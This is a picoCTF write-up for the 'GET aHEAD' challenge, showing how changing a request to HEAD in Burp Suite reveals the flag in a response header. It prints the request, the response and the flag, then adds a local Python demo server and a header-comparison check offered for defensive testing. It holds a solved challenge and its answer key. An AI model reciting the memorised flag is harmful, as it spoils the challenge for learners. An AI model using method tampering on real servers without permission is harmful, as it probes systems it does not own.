GET aHEAD
Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:47967/
1. Use Burp Suite to intercept the request sent when you click the "Choose Blue" button.
2. Change the POST request into a HEAD request:

   ```http
   HEAD /index.php HTTP/1.1
   Host: mercury.picoctf.net:47967
   Content-Length: 0
   Origin: http://mercury.picoctf.net:47967
   Connection: close
   ```

3. The page rendered in the browser is empty, because a HEAD response carries no body, but in Burp Suite's Proxy > HTTP history tab the response to the HEAD request contains the flag as an HTTP header:

   ```http
   HTTP/1.1 200 OK
   flag: picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}
   Content-type: text/html; charset=UTF-8
   ```
picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}
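The point of the challenge is that a server can take a different code path for each request method, so a response header may only exist for a method the web UI never sends. The following added example (it is not the challenge's server code and not part of the original writeup) reproduces that situation locally: a small stdlib HTTP server that answers GET and POST with an HTML body but only sets a `flag` header on HEAD, and a client that compares the header names returned per method so a method-only header stands out. The flag value, the `/index.php` path and the handler behaviour are assumptions made for the demo.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed placeholder; the real challenge flag is in the writeup above.
FLAG = "picoCTF{example_flag_for_local_demo}"
PATH = "/index.php"  # assumed to mirror the request in the writeup


class MethodBranchingHandler(BaseHTTPRequestHandler):
    """Demo server: GET/POST return HTML, HEAD alone exposes an extra header."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _send_html(self, body: bytes) -> None:
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=UTF-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._send_html(b"<html><body>Choose Red or Blue</body></html>")

    def do_POST(self):
        # Consume the form body so the connection stays in sync, then answer.
        length = int(self.headers.get("Content-Length", 0))
        self.rfile.read(length)
        self._send_html(b"<html><body>You chose a colour</body></html>")

    def do_HEAD(self):
        # The method-specific branch: no body, but a header the UI never triggers.
        self.send_response(200)
        self.send_header("flag", FLAG)
        self.send_header("Content-Type", "text/html; charset=UTF-8")
        self.end_headers()


def start_server() -> HTTPServer:
    """Bind to a free loopback port and serve in a background thread."""
    server = HTTPServer(("127.0.0.1", 0), MethodBranchingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch(host: str, port: int, method: str, path: str = PATH):
    """Send one request and return (status, lower-cased header dict, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, headers={"Connection": "close"})
    resp = conn.getresponse()
    headers = {name.lower(): value for name, value in resp.getheaders()}
    body = resp.read()  # http.client knows HEAD responses carry no body
    conn.close()
    return resp.status, headers, body


def method_only_headers(host: str, port: int, methods=("GET", "POST", "HEAD")):
    """Map each method to the header names that appear for it and no other method.

    A defender can run this against their own endpoint to confirm every method
    reaches the intended code path and leaks nothing extra.
    """
    seen = {m: set(fetch(host, port, m)[1]) for m in methods}
    return {
        m: sorted(names - set().union(*(seen[o] for o in methods if o != m)))
        for m, names in seen.items()
    }


if __name__ == "__main__":
    srv = start_server()
    port = srv.server_address[1]
    print("headers unique to each method:", method_only_headers("127.0.0.1", port))
    status, hdrs, body = fetch("127.0.0.1", port, "HEAD")
    print("HEAD ->", status, "flag header:", hdrs.get("flag"), "body bytes:", len(body))
    srv.shutdown()
```

Running the script shows `flag` listed only under HEAD, with an empty body, which is exactly why the browser rendered nothing while Burp's history still showed the header. The same comparison, pointed at a real application, is a cheap regression check that no request method exposes a header or behaviour the others do not.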